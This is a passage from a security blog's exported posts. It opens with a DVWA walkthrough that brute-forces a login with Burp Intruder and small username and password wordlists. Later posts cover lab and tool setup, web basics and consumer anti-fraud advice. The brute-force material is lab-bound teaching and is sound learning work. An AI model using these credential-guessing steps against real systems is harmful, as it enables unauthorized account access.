Brute Force Login Reqest Medium Similar to the previous lesson, click on \u0026ldquo;Action\u0026rdquo; and select \u0026ldquo;Send to Intruder\u0026rdquo;. Set the attack type to \u0026ldquo;Cluster bomb\u0026rdquo;, clear all fields, and add only the username and password value fields for inserting custom payloads.\nFigure 3: The intruder with a user athentication request For the current scenario, we will use the same Word list of common usernames and passwords. Save the text files onto your system or use copy-paste to load the information in the payloads tab.\nusernames.txt\nadmin administrator user john dvwa bob alice root superuser super passwords.txt\nadmin admin123 password password123 user user123 administrator passw0rd r3m3mb3rM3 admin123$ In the \u0026ldquo;Payloads\u0026rdquo; sub-tab, select \u0026ldquo;Payload Set 1\u0026rdquo;, payload type as \u0026ldquo;simple list\u0026rdquo;, and paste all the contents in payload options copied from the usernames.txt list. (For username values)\nSecond, select the \u0026ldquo;Payloads\u0026rdquo; sub-tab, set \u0026ldquo;Payload Set 2\u0026rdquo;, and payload type as \u0026ldquo;simple list\u0026rdquo;, and paste all the contents in payload options copied from the passwords.txt list. (For password field values)\nFigure 4: Brute Force Attack - Intruder Payloads Set The steps were similar to the previous one.\nIf you remember, in the previous Intruder attack summary, we needed to go through each request, select the response message, and look out for the message \u0026ldquo;Username and/or password incorrect\u0026rdquo;.\nWe earlier used the \u0026ldquo;Length\u0026rdquo; size option to drill down and focus on the one with a different size.\nThe Intruder tool provides us with a better way to do it, called \u0026ldquo;Grep - Match\u0026rdquo;, which helps us to find a specific string in the HTTP response body using grep and flags it. A more suitable way to view the results.\nIn the \u0026ldquo;Intruder\u0026rdquo; tab, click on the \u0026ldquo;Options\u0026rdquo; sub-tab and scroll down to \u0026ldquo;Grep - Match\u0026rdquo;, then click on the \u0026ldquo;Clear\u0026rdquo; button.\nFigure 5: Burp Suite Grep - Match If prompts for confirmation, click on \u0026ldquo;Yes\u0026rdquo; to clear.\nFigure 6: Grep Match Clear Confirmation In \u0026ldquo;Grep-Match\u0026rdquo;, type \u0026ldquo;incorrect\u0026rdquo; in a text area and click on the \u0026ldquo;Add\u0026rdquo; button. This word is taken from the invalid user credentials error message \u0026ldquo;Username and/or password incorrect\u0026rdquo;.\nFigure 7: Grep Match Custom String Make sure \u0026ldquo;Flag result items with responses matching these expressions.\u0026rdquo; is enabled and confirm \u0026ldquo;incorrect\u0026rdquo; string is added.\nFigure 8: Grep Match for \u0026ldquo;Incorrect\u0026rdquo; string Match type \u0026ldquo;Simple string\u0026rdquo; suffixed our current requirement.\nFinally, click on the \u0026ldquo;Start attack\u0026rdquo; button and let us verify whether the brute-force vulnerability is fixed or not.\nFigure 9: Intruder Start Attack A new window pops up, and all the Intruder attack summaries will be displayed. Now, an additional row named \u0026ldquo;incorrect\u0026rdquo; is added.\nYou can see that our grep match pattern is working, as we are able to view the match count in the \u0026ldquo;incorrect\u0026rdquo; row updated for each request.\nFigure 10: Brute Force Attack Result If you closely observe, there is one problem. It is slow compared to the previous brute-force attack.\nIt seems the DVWA development team added a small delay, but it\u0026rsquo;s still not stopping us from performing a Brute Force attack.\nIt took more time than before, but we found a valid password match again using the brute-force attack.\nThe one where the \u0026ldquo;incorrect\u0026rdquo; count is empty. i.e., admin/password. As displayed in the above screenshot.\nScroll down to check for the response body and observe a message. \u0026ldquo;Welcome to the password protected area of admin\u0026rdquo;.\nYay!! The vulnerability still remains open. Let\u0026rsquo;s report it back to the DVWA dev team. 😄\nDVWA Informational (Optional) # We are testing this in a DVWA, an intentionally vulnerable environment. The application also allows us to view the backend code for knowledge purposes.\nRemember you might not have this option in real-world applications.\nNavigate to the \u0026ldquo;Brute Force\u0026rdquo; menu item in the sidebar. On the same page click on the \u0026ldquo;View Source\u0026rdquo; button at the bottom of the page.\nFigure 11: Brute Force View Source A pop-up window will be loaded, and the code will be displayed.\nFigure 12: Brute Force Medium Source Code Observe that the application delays 2 seconds before sending the response message back to the client for all failed logins.\nIn general, the vulnerability can be mitigated in many ways, but industry best practices should be adhered to.\n","date":"3 August 2022","externalUrl":null,"permalink":"/dvwa-brute-force-attack-medium-severity/","section":"Posts","summary":"","title":"DVWA Brute Force Attack - Medium Severity","type":"posts"},{"content":"If you\u0026rsquo;re interested in learning and practicing web application security skills but not sure where to get started, this section will walk you through setting up the lab environment of the DVWA docker image, which is one of the practical vulnerable applications for learning web application security skills.\nWhat is DVWA? # Damn Vulnerable web app or Damn Vulnerable Web Application (DVWA) is an intentionally designed vulnerable application for pen-testers and security experts in learning and testing web application security in a legal environment. It is developed using PHP/MySQL and can be deployed easily using an Apache server.\nDVWA Git Repository\nDVWA can be installed in multiple ways, such as using code from GitHub, Vagrant, or a Docker image, etc.\nIt is recommended to host the vulnerable applications in a host-only environment to prevent compromising other systems on your network by attackers.\nYou can even view the source code or contribute to the DVWA project. It\u0026rsquo;s an open-source project.\nFor simplicity, we will be using our systems and pre-built docker DVWA image, which is publicly available, rather than setting up the whole stuff by ourselves. By running the DVWA docker container, we can save a lot of time and jump-start learning application security and penetration testing directly.\nRequirements # Docker installed \u0026amp; enabled on your Laptop/Desktop Any Operating System (OS) Linux/Windows/Mac I am a GNU/Linux user, so most of the commands you will see from here on will be based on Linux (Debian), and similar commands do apply to other Linux flavors like Ubuntu and Mac with minor tweaks.\nFor Windows users, you can use either PowerShell or git Bash, where similar commands can be executed, or even the Windows Subsystem for Linux can also be used.\nVerify Docker Setup # docker --version Output:\nDocker version 20.10.17, build 100c701 If the output is similar to the above, it means the docker is installed on your system and good to start.\nFor users whose docker is not installed, please visit the Get Docker page for installation.\nManage Docker as Non-Root Users (Linux-based OS Users) # For users who are using docker on Linux-based operating systems, we need to take one more additional step to ensure we can manage the docker image as non-root users.\nAfter installation of docker, create a docker group and add the newly created user to the docker group.\n$ sudo groupadd docker $ sudo usermod -aG docker $USER Now log out of the user account and log back in again to verify you are now able to manage the docker instances from non-root users.\n$ docker run hello-world Output:\nFigure 1: Docker Hello World Output The above output confirms that we can manage Docker with non-root user privileges. More details can be found on the post-installation docker page below.\nFigure 2: Benefits of DVWA Benefits of Local DVWA Environment # Practice any time. Ability to test any customized payloads or exploits. It can be used to test the effectiveness of Web Vulnerability Scanners or Automated Tools It can be used for Teaching. Ability to test custom security fixes. Running DVWA docker # I hope your Docker environment is configured so we can start working. Here, we will use the Docker image, which has already been built and hosted in the Docker Hub.\nDamn Vulnerable Web Application Docker Image: https://hub.docker.com/r/vulnerables/web-dvwa/\nCommand:\ndocker run --rm -it -p 80:80 vulnerables/web-dvwa The above command will download the docker image for the first time and will start immediately on port 80 after downloading it. Click here to verify.\nIf you are using port \u0026ldquo;80\u0026rdquo; for some other service in your operating system, you can change the docker container port to some random one (say 8443). Update the -p value with -p 80:8443. Ensure the updated port is used in the URL while accessing the DVWA web application. To manually view, open a browser and visit \u0026ldquo;http://localhost/\u0026rdquo;, you should be able to see the output as shown below:\nFigure 3: DVWA Login Page The image will start displaying the console logs of the operations being performed on the DVWA website for reference.\nStop the running Docker image anytime by typing Ctrl - c in your console.\nDVWA Admin Password # Now log into the application using Username admin, Password as password, Navigate to Setup DVWA ⇾ click on Create/Reset Database button.\nFigure 4: Setting up DVWA Figure 5: DVWA database creation We can observe that the database has been created with a users\u0026rsquo; table. Some sample data is also inserted into the tables for our testing purposes.\nDamn Vulnerable Web App Walkthrough: # Log into the DVWA application and observe most of OWASP\u0026rsquo;s top-known vulnerabilities that have been created so you can get started. They are displayed as shown below.\nFigure 6: DVWA Challenges Overview Our practice lab environment is up and is good to go.\nFrom the above screenshot, you can use the DVWA to practice and get hands-on experience with known vulnerabilities, such as Brute Force, Command Injection, CSRF, XSS, etc.\nClick on any vulnerability in the left-side menu, and the application will load the vulnerable page. All pages simulate close-to real-time application behaviors and provide hints to help you narrow down and use the correct type of vulnerable payloads for exploitation.\nRemember that all our changes will be lost once you stop the DVWA docker image. You might need to repeat the above steps when you start. This is how the docker is designed, and it also allows us to begin with a fresh environment without worrying about previous changes.\nThe docker image needs some more tweaks, but we will do them when needed based on the type of attack we are discussing.\nDVWA Security Levels # In the DVWA application, there are multiple levels to test any specific vulnerability, ranging from Low to Medium to High and Impossible.\nFigure 7: DVWA Security Level These levels help you build skills by understanding each scenario. First, you learn about the attack itself. Then, you will know how broken fixes are implemented and how they can be bypassed. Lastly, you will learn the best way to secure a particular functionality.\nThe DVWA security levels are different for older versions. In the old version, high is a good practice for fixing code.\nIt is recommended that you go step by step. I still use it today to test specific payloads before they are applied to real-time applications as part of security testing.\nDVWA View Source and View Help # The DVWA application is mainly designed as a learning platform for application security. It also allows us to view the backend code for knowledge purposes.\n💻 Remember, you might not have this option for real-world applications. This is just for educational purposes only.\nNavigate to any vulnerability in the menu. Say the \u0026ldquo;Brute Force\u0026rdquo; menu item in the sidebar. On the same page, click on the \u0026ldquo;View Source\u0026rdquo; button at the bottom.\nSimilarly, the \u0026ldquo;View Help\u0026rdquo; button or \u0026ldquo;More Information\u0026rdquo; section can be used if you struck somewhere as initial help.\nFigure 8: DVWA View Source or Help Information I hope the above information helps you to get started with a damn vulnerable web app docker.\nIf you want to learn about some basic web foundations before jumping into web security vulnerabilities, refer to the bookmarks below.\nSecurity Foundations: What is Web Application and How does it work? Discover the fundamentals of what is a web application, URLs, and popular web application architectures. Gain insights into the core concepts that drive the digital world forward. Begin your journey by establishing strong security foundations.\nSecurity Foundations: HTTP Basics Tutorial Uncover the fundamentals of HTTP in this beginner-friendly way. HTTP Basics Tutorials is a guide for those new to information security or diving into web application security\nFAQ\u0026rsquo;s # How to log into a damn vulnerable web app login? # You can use the credentials like username as admin and password as password.\n","date":"30 July 2022","externalUrl":null,"permalink":"/lab-setup-docker-dvwa/","section":"Posts","summary":"","title":"Lab Setup - Docker DVWA","type":"posts"},{"content":"BurpSuite is a tool specifically designed for application security testing. It is used for crawling the website, tampering with HTTP messages, identifying vulnerabilities, automating security testing, and many more functionalities are inbuilt.\nWe will cover the sections of BurpSuite individually as we keep trying for security vulnerabilities.\nBurpSuite(owned by portswigger) offers three variants, a community edition, a professional, and an enterprise edition. We will use community edition throughout the articles, which suffixes our requirement.\nThe burp suite can be found here: https://portswigger.net/burp/communitydownload.\nOnce you are familiar with security assessments and concepts, I would recommend you to go for the professional edition as it has many more benefits, like saving the sessions, optimizing scans, scheduling the assessments, etc.\nBurpSuite professional edition saves a lot of time while performing real-world security assessments.\nOWASP ZAP is an alternative. You can also use it or keep using the BurpSuite community edition, which has limitations but can help complete our work.\nBurpSuite Installation # Visit the BurpSuite download page and click the \u0026ldquo;Go Straight to downloads\u0026rdquo; section.\nFigure 1: BurpSuite Community Download Page Make sure you are downloading the community version.\nI am using the Linux-based OS, therefore choosing the Linux (64-bit) version and clicking on the \u0026ldquo;Download\u0026rdquo; button.\nClick on the \u0026ldquo;Show Checksums\u0026rdquo; after downloading. It is displayed as shown below.\nFigure 2: Validate Checksums use md5sum or sha256 sum from the command line to verify your download. $md5sum burpsuite_community_linux_v2022_7_1.sh c48c31aa69754adaf394a215dff0ecc5 burpsuite_community_linux_v2022_7_1.sh This helps to verify that the file you have downloaded is indeed from the portswigger release and not tampered with by any malicious users.\nThe installation is straightforward. Make the script executable using the chmod command. If you are using Kali Linux, the BurpSuite will come pre-installed.\nchmod u+x burpsuite_community_linux_v2022_7_1.sh Run the executable and follow the instructions. ./burpsuite_community_linux_v2022_7_1.sh Figure 3: BurpSuite Installation Screen Select where you want to install the BurpSuite and click on the next.\nFigure 4: Choose Installation Directory Keep the default for the location of the symlink and click on next.\nFigure 5: Selecting symlinks\u0026rsquo; default location Click on \u0026ldquo;Finish\u0026rdquo; to complete the installation.\nFigure 6: BurpSuite Installation Complete Starting BurpSuite # Navigate through your system application, look for the \u0026ldquo;BurpSuite Community\u0026rdquo; icon, and click to launch. It can also be found manually by going to the BurpSuite installation directory and running ./BurpSuiteCommunity.\nFigure 7: BurpSuite Launch Screen Here we can observe that the saving of the project feature is only limited to the professional edition.\nSelect the Temporary project and click the \u0026ldquo;Next\u0026rdquo; button to continue.\nFigure 8: BurpSuite Configuration Screen Custom configuration in BurpSuite gives you more control over how the tool must behave, what type of checks you want to enable by default etc. This we will be covering more in the advanced section.\nLet\u0026rsquo;s start using the BurpSuite defaults and click the \u0026ldquo;Start Burp\u0026ldquo;button.\nFinally, the BurpSuite will be launched and will be displayed as shown below.\nFigure 9: BurpSuite Tool The installation process will be very similar to Mac and Windows operating systems, with minor changes.\nEnsure your BurpSuite is installed and running before continuing to the next section, the BurpSuite overview.\n","date":"28 July 2022","externalUrl":null,"permalink":"/burpsuite-installation/","section":"Posts","summary":"","title":"BurpSuite Installation","type":"posts"},{"content":"In this section, we shall cover the web and how it works. This will act as a foundation for identifying security vulnerabilities further down the posts.\nWhat is a web Application? # Web applications are programs designed to perform specific operations for users or other applications.\nExamples: Reading News, Watching Videos, Editing Photos online, etc.\nAs users, we will be using Web Browsers like Chrome, Firefox, etc., to interact with the web applications where numerous actions are performed by our browsers behind the scenes once we give domain information in the URL bar.\nFigure 1: Web Application Introduction Have you ever wondered how different browsers handle all these functions, and you get similar results in all Web Browsers to the most extent?\nThe Internet Engineering Task Force is a standards organization body for the Internet and other technical standards.\nThe standards body is an individual or group of engineers and computer scientists who publish the methods, behaviors, innovations, and standards of how the internet and internet-connected systems should work.\n*Request For Comments (RFC)*\nRFC: After lots of peer review and evaluations are done for each proposal, it is standardized, and each proposal is given a Request For Comment (RFC) number. Therefore, all the applications developed to work with the internet must adhere to RFC standards.\nI recommend going through RFC documents whenever you want to learn further. This might help you uncover new security bugs.\nWhat is a URL? # URL is an acronym used for the Uniform Resource Locator. It\u0026rsquo;s a type of web address that specifies the location of a specific resource on the internet.\nURL consists of different components. Let\u0026rsquo;s look at them in detail.\nFigure 2: URL Components Protocol - A standard used for processing data. Domain Name - A user-readable address pointing to an IP address on the internet. Port - Specific port used for communication. (HTTP runs on port 80, and HTTPS runs on port 443). Path - It represents the file or subdirectory structure on the server. Parameter - A special kind of variable defined to pass values for processing. Value - The value of a parameter assigned. It can contain characters and numerics. How does URL work? # When you type a URL in your browser, the first request will be sent to the Domain Name System (DNS). In DNS, it will look out for the mapping IP address for the given domain name and send IP information to the browser.\nFigure 3: How DNS Works Next, the browser uses the IP address information received and initiates the TCP connection with the Server. Once the server responds with confirmation, a valid channel is established and starts exchanging requests and responses.\nWeb Applications Architectures # Let\u0026rsquo;s dig a bit deeper. All web applications and technologies are logically connected for client-server communication to ensure a better web experience.\nFrom here on, we will refer to all the operations performed on the user side as Client (Ex, Web Browsers, Terminal, etc.) and one which accepts our request and responds as Server (Example: Nginx, Apache, etc.).\nAs of today, web application architectures have become very complex. Let\u0026rsquo;s start with the basics without worrying much, and you can build on your expertise from here on.\nClient - Server Architecture (2-Tiered) # Figure 4: Client Server Architecture In the case of client-server architecture, A web application is hosted on a single server that will process all the client\u0026rsquo;s requests and respond back.\nClient - Server Architecture (3 - Tiered) # Figure 5: Client Server - (3 - Tiered) In the case of client-server architecture, A web application is hosted on multiple servers, a Web Server and a Database Server, where the web server takes a request from clients and fetches the necessary data from the database, formats it and sends it back to the client requested.\nClient - Server (n-tier) # Figure 6: Client Server - (n-tired) or Hybrid Architecture In the case of n-tier architecture, there can be any number of Web and Database servers, where all the traffic being received from the client is routed to the server with less load. Most of today\u0026rsquo;s applications are deployed similarly to the above architecture.\nTechnologies # Technologies are generally classified into two types.\nClient Side Technologies Server Side Technologies. Let\u0026rsquo;s check out some examples. You might already be familiar with some technologies.\nFigure 7: Various Technologies' Client Side Technologies # Our browser understands HTML, CSS, and JavaScript technologies whenever the server sends information using them. The browser renders and displays the content in a human-readable format by hiding all complex code from the user\u0026rsquo;s view.\nServer Side Technologies # In the screenshot above, we highlighted a few programming languages like Python, PHP, Golang, etc., but there are many more server-side technologies. These high-level programming languages run on the server, process data, and format the data into a format the client can understand.\nConclusion # I hope you have some idea about the web and its technologies by now.\nNext, Refer the HTTP basics, which are helpful for security assessments and used by developers and administrators to understand what the server says and take action based on it.\n","date":"25 July 2022","externalUrl":null,"permalink":"/what-is-web-application-and-how-does-it-work/","section":"Posts","summary":"","title":"What is Web Application and How does it work?","type":"posts"},{"content":"Shopping online today is a great way to save time and money, but taking a few precautions to protect yourself from online fraud is essential.\nWhat is Online Fraud? # Online fraud is the act of stealing or attempting to steal money, information, or other valuable items by using the internet.\nStealing via the internet can be done in several ways, including breaking into accounts and websites, scamming people out of money, selling fake products, etc.\nIt is becoming increasingly common due to the widespread use of smartphones, and computers, to buy online for both personal and business requirements.\nHow do Attackers get an edge? # In terms of security, humans are as secure as the weakest link in the chain.\nComputer systems are designed to store, retrieve, and process information according to standards. Humans learn, think, process, and act differently based on our unique experiences and perceptions.\nSome of our routine habits make us less secure and cause mistakes that attackers exploit. For example, falling prey to quick-rich schemes, too-good-to-be-true offers, winning a lottery and free money, etc.\nAs detailed below, one can take basic precautionary measures to stay safe from cyberattacks.\nSome tips to avoid being a victim of online fraud # Use known Retail provider websites # You can use search engines to find your favorite retail provider to shop online. Better than clicking on the links received.\nSometimes we might need to use a new provider for various reasons. In those cases, reviewing the information is one of the most important things.\nFirstly, check in detail about the vendor\u0026rsquo;s office location, previous customers\u0026rsquo; feedback, and the reputation of the quality offerings.\nSecondly, watch out for poor spelling, flipped names, email addresses, and other information that attackers may try to trick you with by making them look similar.\nLastly, if you are not comfortable sharing your card details with the new vendor, in those cases, a third-party portal like PayPal can be used for making payments at an added cost.\nVerify SSL is enabled and used (Lock Icon in the address bar) # An SSL connection encrypts your traffic and helps protect you from sniffing and snooping by unknown parties on the network.\nUse trusted Devices # Ensure to use a device like a laptop or a mobile device that is patched and updated continuously, free from all viruses.\nDouble-check details and Return Policies. # Make sure to verify the product details, version, model number, and price before and after receiving the purchase.\nEnsure your purchase is covered by warranty and your options for returning the product if it is missing or damaged.\nNever give out additional personal information. # Provide only the necessary details for the transaction and delivery or courier. If something goes wrong, report it.\nNever give out sensitive information, such as bank account numbers and social security numbers, to anyone you do not know.\nUse a credit card instead of a debit card: # Using a credit card instead of a debit card can help protect you from unauthorized charges.\nCredit cards provide a safer way to spend money than debit cards. As credit cards have more robust fraud protection and are not connected directly to your bank account, funds are not withdrawn until the end of the month.\nThey also have spending limits and built-in fraud protections to help you avoid being scammed. In some cases, providers do offer refunds under certain circumstances.\nReport any suspicious behavior to your bank or the authorities: # If you experience suspicious behavior when shopping online, don\u0026rsquo;t hesitate to contact your bank or the responsible references. Reporting any suspicious behavior can help protect you from future online fraud.\nCheck Statement Regularly # Monitor all your bank, credit card, and credit score statements regularly for anomalies.\nUse a VPN in case of Public Wi-Fi. # Public Wi-Fi networks are more prone to sniffing attacks. We might never now the motives of the other user who is sharing the same network. Using a trusted VPN for secure transactions and purchases or using a reliable network like home is recommended.\nAlso, keep an eye on your surroundings when keying in card details in public.\nStrong Passwords # Keep and ensure you are using a strong password for your online shopping accounts, and it should not be a common one that you already use somewhere else.\nSkip the card and use your smartphone whenever possible. # You can try using apps like Google Pay and Apple Pay wherever applicable and avoid using the physical card wherever applicable.\nUse trusted Browser # Ensure that your Browser is the latest and downloaded from the official sources.\nA secure browser prevents all kinds of tracking and snooping on your traffic and helps protect you from phishing schemes and other forms of online fraud. (Say Firefox, Chrome, etc.)\nBrowsers like Firefox have a handy add-on called \u0026ldquo;Firefox Multi-Account Container\u0026rdquo; that provides a separate space for each activity, such as Banking, Personal, Work, etc. It provides additional security from cookie-stealing sites.\nBlock intruders and report abuse. # Received calls, emails, or messages about winning the lottery, packages you haven\u0026rsquo;t ordered, or huge discounts from unknown senders? Ignore them or report them for spam.\nConclusion # It\u0026rsquo;s always wise to protect yourself from fraud, primarily online. Be sure to check the details of any product you buy online, and never give out your personal information unless you know the other party well.\nEnjoy safe shopping online.\n","date":"2 July 2022","externalUrl":null,"permalink":"/tips-for-securing-your-online-shopping-experience/","section":"Posts","summary":"","title":"Tips for Securing your Online Shopping Experience","type":"posts"},{"content":"Credit and debit card data breaches happen more often, one might imagine. In 2020, the US alone reported 393207 credit card frauds, a 44.7% increase compared to the earlier year. It can be more if combined worldwide altogether.\nData breaches can be a painful experience for some users whose card was used for unauthorized purchases by attackers or if the amount is already stolen from their bank accounts. Data breach victims are left with the daunting task of determining what to do next and if they\u0026rsquo;ll ever get their money back.\nHowever, with a little precaution, the Impact of these security breaches can be reduced. It\u0026rsquo;s important to know what to do in the event of a data breach to protect loved ones. Here\u0026rsquo;s what to do if you or your family suffer a credit or debit card data breach, as well as prevention tips.\nWhat is a Credit/Debit card data breach? # A credit or debit card data breach is when unauthorized individuals gain access to the personal information of credit or debit cardholders, such as their name, address, phone number, email address, card expiry date, PIN, and credit card number.\nThis can happen when a company\u0026rsquo;s infrastructure is hacked, a retailer\u0026rsquo;s point-of-sale system is compromised, or an individual\u0026rsquo;s personal information is stolen in a data breach.\nHow does the breach happen? # Card data breaches can happen in several ways. One common way is when companies\u0026rsquo; infrastructure is hacked. This can include compromising a company\u0026rsquo;s website, database servers, backup systems, etc. When these systems are compromised, cyber criminals can access customers\u0026rsquo; credit and debit card numbers.\nEven though the organizations ensure strong security practices and strict compliance, missing any of the below can also result in a breach.\nWeak cryptography practices Weak access control mechanisms allow unauthorized persons to get access to internal data. Missing data retention policies and keeping sensitive personal data longer than needed Lack of security awareness culture Unpatched systems The weak screening process for third-party vendors or contractors, etc. In addition, card data breaches can also occur when individuals\u0026rsquo; personal information is stolen. This can happen through the compromise of the user\u0026rsquo;s own devices or through the installation of malicious applications.\nWhat to do if your card data is compromised? # Verify the Source: # Firstly, the source of the information from where you receive it is one of the most important things. If you receive a call from someone claiming to be from your credit card company and they ask for personal information, hang up and call the number on the back of your card. Legitimate credit card companies will never ask for personal information over the phone.\nFrom Internet/News Portals: # If you have received the information from the news portal, contact your bank, credit card company, or retailer immediately and confirm if any of your personal information and card details were compromised in the breach.\nNotification from authorized Bank or Retailer: # Have you been notified by a retailer or a banker about a card data breach? If yes, check with them about specifics, such as what data was accessed in the breach. For example, Card numbers, expiration date, Personal Information, etc.\nGenerally, banks and retailers are proactive and will be the first to notify you about your data compromise. Some retailers also offer a free credit monitoring service for some time.\nIn addition to the steps mentioned above, you can take the following detailed measures to prevent further damage.\nHow to take care of your credit or debit card? # You can freeze up the card and ask for a new replacement card. This will prevent any further fraudulent charges from being made. Request a card services provider to place a fraud alert on your account. You can also request your bank to have your account frozen. Monitor your credit report and bank statements closely. Look out for fraudulent credit card purchases. File a police report. (If applicable, based on your province) Update passwords for all your affected accounts and ensure a unique one is used for all different accounts. Watch out for phishing emails. If the cybercriminals have missing pieces of your card information, they will send phishing emails and scam calls to get the remaining data from you. Make sure to contact a valid customer care number rather than one found in a spam email. Never give personal information to someone who initiates contact with you over the phone. Subscribe for transaction notifications, login alerts, etc. (if offered by the service provider). File a complaint with the legal body. (if applicable, based on your province) Do not share any OTPs with unknown callers. Do not click on any verification links that are not expected. What do attackers do once they\u0026rsquo;ve stolen my card details? # Cybercriminals can use the stolen data in several ways, depending on their needs and goals.\nThey could use the card data to make fraudulent purchases or to create fake cards that can be used for funding criminal activities.\nThey could also sell the information online to other criminals, who may use it to commit identity theft or other crimes.\nThe stolen data could also be used to steal money from the victim\u0026rsquo;s bank account or to take out loans in their name.\nIn some cases, the cybercriminals may also attempt to blackmail the victim into paying them money in exchange for not releasing the stolen data to the public.\nConclusion # I hope our steps in this article have helped you secure your finances for personal safety.\nIf you\u0026rsquo;re still feeling anxious, speaking with someone specializing in credit card fraud might be a good idea. They can help answer any questions or concerns arising from being caught up in a breach of information security at one\u0026rsquo;s bank or other organization where they maintain their account.\nAll points mentioned in this article are the author\u0026rsquo;s views. Please check with your authorized financial institution or with your country\u0026rsquo;s laws for more information. ","date":"2 February 2022","externalUrl":null,"permalink":"/steps-to-take-if-your-credit-card-data-is-compromised/","section":"Posts","summary":"","title":"Steps to Take if Your Credit Card Data is Compromised","type":"posts"},{"content":"Password!, Password!, Password!! Too many to remember, and Tired of resetting the online accounts often?\nOnline accounts always pose a risk of being hacked. Password breaches are becoming more frequent, and it\u0026rsquo;s easy to be overwhelmed by the responsibility of protecting your passwords.\nPassword managers are one of the best ways to stay ahead of the problem.\nWhat is a Password Manager? # Password managers are one of the solutions for managing all your online account passwords in one place, reducing the stress on you to remember them all. It even saves a lot of effort and time in managing it. Let\u0026rsquo;s understand in detail.\nPassword managers help fill up the user login forms with just a click, and you can be assured that all your information is correct without typos. It includes an encrypted vault for your passwords, making it an excellent tool for sharing one password/key with a team or family. It helps generate strong and unique passwords of variable lengths for all your online accounts, which can be used directly. Password managers are even available on mobile devices if you want the convenience of access throughout your day. Some password managers can even detect if your accounts are compromised in the latest breach and notify you to secure it immediately. For those who prioritize privacy over convenience, there are also self-hosted password managers so that no one has access to your data but you!\nFinally, password managers are manageable to use so you can try them!\nHow to get started? # There are many Password Managers in the market, both paid and self-hosted. Choose based on your requirements!\nSome popular online password managers include # LastPass 1Password Dashlane Keeper Google Password Manager etc. Self-Hosted Password Managers include # KeePassXC Bitwarden etc. The password managers mentioned here are a small sample of Password Managers that you can select from, but they all can store passwords and other sensitive information in one secure place!\nThings to avoid while using Password Managers # You should avoid bad habits if you want to use a password manager successfully.\nReusing passwords # This is one of the biggest mistakes people make and the easiest way for someone to get into all your accounts.\nOne of the best ways to avoid password breaches is to ensure you\u0026rsquo;re using a strong and unique password for each account, which is used nowhere else. This will help ensure that if one of your accounts is compromised, your other accounts are safe. So you don\u0026rsquo;t have to worry about it.\nmake sure you\u0026rsquo;re using a strong and unique password for your Password Manager as well. Avoid guessable passwords # Some of the most common, easily guessable passwords are abc123, qwerty, password123, etc. (Which are not allowed by most of the applications, but still good to avoid)\nAlso, avoid using passwords like mobile numbers, pet names, favorite movie characters, etc.\nUse a strong master password with combinations of lower case, upper case, numerics, and symbols with a length of more than 12 chars.\nDon\u0026rsquo;t Forget Master Password # The master password is the single key to unlock your Password Manager; if you forget this, You lose access to all your data!\nMake sure you find a way to remember it.\nBackup \u0026amp; Store Securely (For Self Hosted users) # You must back up and store your encrypted Password Manager file securely.\nEncrypted copies of self-hosted Password Manager files can even be stored on the cloud so that if someone else has access, they won\u0026rsquo;t be able to see it.\nAlso, use Two Factor Authentication for any online services/accounts where 2FA is available to protect yourself even more and reduce chances of hack attacks, etc.\nSummary # Password breaches happen more frequently than ever, so it\u0026rsquo;s essential to be proactive about security when saving your online accounts\u0026rsquo; login credentials. Password managers make this process easier by storing all your account details in an encrypted vault for easy access at any time. If you haven\u0026rsquo;t tried using a Password Manager yet - what are you waiting for? It\u0026rsquo;ll help keep your data safe and sound!\nReferences # https://en.wikipedia.org/wiki/Password_manager ","date":"13 January 2022","externalUrl":null,"permalink":"/secure-your-passwords-easily/","section":"Posts","summary":"","title":"Secure your passwords easily","type":"posts"},{"content":"In this post, we will cover little bits of information that can help you identify whether it\u0026rsquo;s a valid phone call or a fraudster trying to lure you into a trap.\nIn today\u0026rsquo;s world, we are digitally connected, and our mobile device helps us to get things done by providing multiple options. (Through calls, messages, emails, etc.)\nAt the same time, with or without our knowledge, we might be sharing some of our information with other parties, and how the different parties use it is something beyond our understanding.\nA minimal awareness can help you protect yourself from many spam callers.\nIdentifying fraud/spam calls # Below are some tips for identifying spam or fraud calls.\nThey try to start the conversation with what they know, like your phone number, and they try to extract more information from you by asking for details. The conversation starts with incorrect information. If you mention it as wrong info, followed by spammers will ask for your details to update their database. If you try to ask for more information, the fraudsters keep providing you with generic information that may be of little or no use. The spammer calls you and asks you to prove your identity before they can disclose some exciting offers or information. Example: Call claiming from a government entity # One of the techniques is to claim they are calling from a government body and mention that you are in a problem for doing something wrong.\nScammers act as if they are helping you by doing a favor and keep pressuring you to transfer XXX$ amount immediately, so they can rectify it without you being penalized by a government body or going to prison.\nIn return, they will ask you to provide more details and prove your identity.\nHang on to the call and verify with the service provider if it\u0026rsquo;s valid. Make some online inquiries about the information provided. Responding to Fraud/Spam calls # Do-Not-Disturb Service # Some operators offer the Do Not Disturb service, which will prevent spam \u0026amp; fraud calls to some extent. Enable it if available.\nUsing a Third-Party Service # One tip is to use an app or online service to identify the caller. These services do keep an updated list of the spam/fraud callers based on the user\u0026rsquo;s feedback and using their proprietary techniques. Let\u0026rsquo;s say Whoscall, showcaller, Truecaller, etc. Choose any service that meets your requirements.\nA point to keep in mind is, as data is a new business model. We depend on online services for majority of our activities. Drop the call # When you realize it is a ‌‌spam/fraud call, disconnect it. Though you can chit-chat for some entertainment or fun, they try to collect the piece of information to build your profile in their database. Also, later you may get more spam calls than expected.\nSlow them down and check for legitimate business information and time to consider the purchase. The spammer will keep on adding pressure to commit right away.\nDo Not Provide any Sensitive information. # Deny providing any information like your home address, Bank account information, Usernames, Passwords, OTPs, info on government-issued identity cards, etc.\nYou can always call back to genuine customer care service/organization to verify the information you received is accurate. Also, you can visit their nearest branch to confirm if it\u0026rsquo;s nearby.\nDo not follow any Instructions. # Sometimes to steal funds from your account, they may have gathered all details through various social engineering techniques or from the internet, and all they want is an OTP or a confirmation code.\nAvoid typing any PINs or Passwords when they insist on it. Do not pay any shipping or duty taxes for unknown gifts. Are you already a victim? # Please report it # Immediately report it to the respective organization and cybercrime department based on your locality/Country. For financial accounts, request that banks freeze up all your bank accounts, credit cards, etc., until it is sorted. Reset Passwords and enable Multi-Factor Authentication. (if available) Ensure passwords are reset for all the impacted accounts. Reset Devices (if necessary) If you suspect any of the device might be compromised while clicking any unwanted links, then it would be safe to take backup of all important data and reset all devices. ","date":"6 January 2022","externalUrl":null,"permalink":"/valid-phone-call-or-a-fraud-call/","section":"Posts","summary":"","title":"Valid phone call or a fraud call?","type":"posts"},{"content":"Do you own or maintain any websites? If yes, this might be helpful for you.\nSecurity is a significant concern for any website these days. To help provide security to their users, many websites have adopted the proposed security standard of a security.txt file to allow researchers and hackers alike to find vulnerabilities and 